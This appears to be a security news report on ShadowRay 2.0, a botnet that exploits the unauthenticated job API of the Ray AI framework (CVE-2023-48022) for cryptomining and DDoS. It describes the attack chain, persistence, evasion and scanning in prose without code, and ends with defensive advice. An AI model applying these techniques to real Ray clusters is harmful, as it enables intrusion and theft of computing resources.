A new wave of cyber attacks has emerged as Oligo Security reports active exploitation of a long standing security weakness in the Ray open source AI framework. This flaw, identified as CVE 2023 48022 with a critical 9.8 rating, is being used to compromise Ray clusters equipped with NVIDIA GPUs. The compromised infrastructure is then converted into a fast spreading cryptomining botnet known as ShadowRay 2.0.
Unpatched Flaw Enables Full Cluster Takeover
The current campaign builds upon earlier activity seen between September 2023 and March 2024. Attackers abuse the missing authentication issue in Ray to seize control of exposed instances and deploy XMRig mining operations. According to researchers, the vulnerability has remained unresolved due to Ray’s design choice which expects the framework to operate inside isolated and trusted environments.
Malicious Jobs Used for Reconnaissance and Payload Delivery
Threat actors gain control by sending malicious tasks to the unauthenticated Ray Job Submission API located at “/api/jobs/”. These tasks range from basic system checks to multi step Bash and Python payloads. Once a Ray cluster is compromised, it becomes a launching point for additional attacks against other exposed Ray dashboards, producing a worm like infection that spreads from one target to another.
GitHub and GitLab Used for Payload Hosting
Investigators found that attackers stored their malware in repositories with names such as “ironern440 group” and “thisisforwork440 ops” on GitHub and GitLab. Although these accounts have been removed, the group quickly created new repositories which shows their persistence and operational readiness.
The deployed payloads take advantage of Ray’s orchestration features to move laterally across internal nodes, open reverse shells, maintain remote access, and establish persistence through scheduled cron jobs that run every fifteen minutes. These jobs repeatedly download the latest malware build from GitLab to keep all infected hosts under control.
Advanced Evasion, Region Specific Variants and Miner Competition Removal
Researchers Avi Lumelsky and Gal Elbaz stated that the attackers repurposed Ray’s legitimate capabilities to construct a fully autonomous global cryptomining operation. The malware also appears to be partially generated using large language models based on the structure and code style.
The infection flow includes a region check for victims located in China. If the user is inside that region, the botnet installs a modified variant. Additionally, the malware identifies and terminates other running miners to eliminate competition. To remain unnoticed, the malicious processes mimic legitimate Linux kernel worker tasks and limit CPU usage to around 60 percent.
Large Attack Surface Created by Exposed Ray Servers
Despite Ray being intended for secure internal network usage, more than 230,500 Ray servers are publicly reachable. Attackers scan these systems using the tool interact.sh to identify vulnerable dashboards.
Anyscale has introduced the Ray Open Ports Checker to help organizations verify safe configuration settings. Experts also recommend tightening firewall rules and placing authorization controls on the default Ray Dashboard port, which is 8265.
Botnet Expands Into DDoS Attacks
Oligo reports that attackers have deployed sockstress, a TCP state exhaustion tool, through the compromised clusters. This suggests that ShadowRay 2.0 is evolving beyond cryptomining and is now being used for denial of service attacks. Since port 3333 is associated with mining pools, the attacks may be aimed at disrupting rival mining operations or supporting paid DDoS services.
